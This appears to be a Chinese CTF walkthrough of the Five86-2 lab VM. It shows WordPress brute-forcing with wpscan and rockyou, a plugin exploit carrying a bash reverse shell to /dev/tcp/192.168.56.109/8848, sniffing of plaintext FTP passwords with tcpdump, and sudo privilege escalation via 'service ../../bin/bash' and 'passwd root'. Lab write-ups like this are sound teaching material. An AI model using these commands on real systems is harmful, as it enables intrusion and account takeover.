2020-02-26
情报收集
1 |
|
无 ProFTPD 1.3.5e
相关漏洞,无法匿名登录
后台放置目录枚举,WordPress
站点 wpscan
扫描
逐一访问,无有价值信息,wpscan
枚举出了几个用户名:
1 | barney |
尝试枚举爆破,枚举出两个密码:
1 | wpscan --url http://192.168.56.117 -U tmp/user.txt -P /usr/share/wordlists/rockyou.txt -t 30 |
撬开大门
1 | barney : spooky1 |
两个账号均可登录后台,不过 stephen
无利用点
barney
登陆后,有三个插件,搜索相关漏洞,除第三个插件外,其他暂无价值:
根据 PoC
说明,写出 exp
,上传后,本地端口监听,访问上传网址,得到 shell
:
1 | "/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.109/8848 0>&1'"); exec( |
注意:用 echo
写入的时候注意引号的转义,写入后最好再查看一遍利用脚本的内容是否正确
登堂入室
接收到了 shell
先收集一波信息,最喜欢的 /etc/passwd
里总是包含用户及其主目录,HOME
下的用户目录无访问权限
各种信息收集了一波,当前用户的作用实在不大。无思路无目的时候,就是收集的情报不够,整理一下现有资料:
1 | PORT STATE SERVICE VERSION |
身份转换
su stephen
:切换用户
不存在 sudo
权限,主目录暂无利用信息,卡住了
查了一下 WriteUp,抓 FTP
的包,有明文密码:
查看相关进程:
1 | ps -aux | grep "ftp" |
查看 FTP 监听的网卡:
1 | ip addr |
抓包,得到密码:
1 | timeout 50 tcpdump -i br-eca3858d86bf -w pack.pcap |
权限提升
登录 paul
查看可以 sudo
执行的程序:
1 | Matching Defaults entries for paul on five86-2: |
/usr/sbin/service
提权:
1 | sudo -u peter service ../../bin/bash |
查看可以 sudo
执行的程序:
1 | Matching Defaults entries for peter on five86-2: |
修改 root
密码,登录 root
查看 flag
:
1 | sudo passwd root |
卡在了 FTP
抓包的位置,还是经验不足
前期收集的信息必定是有用的,FTP
使用明文传输密码,只需要抓包,就可以得到
查看系统正在运行的进程也要加入信息收集里面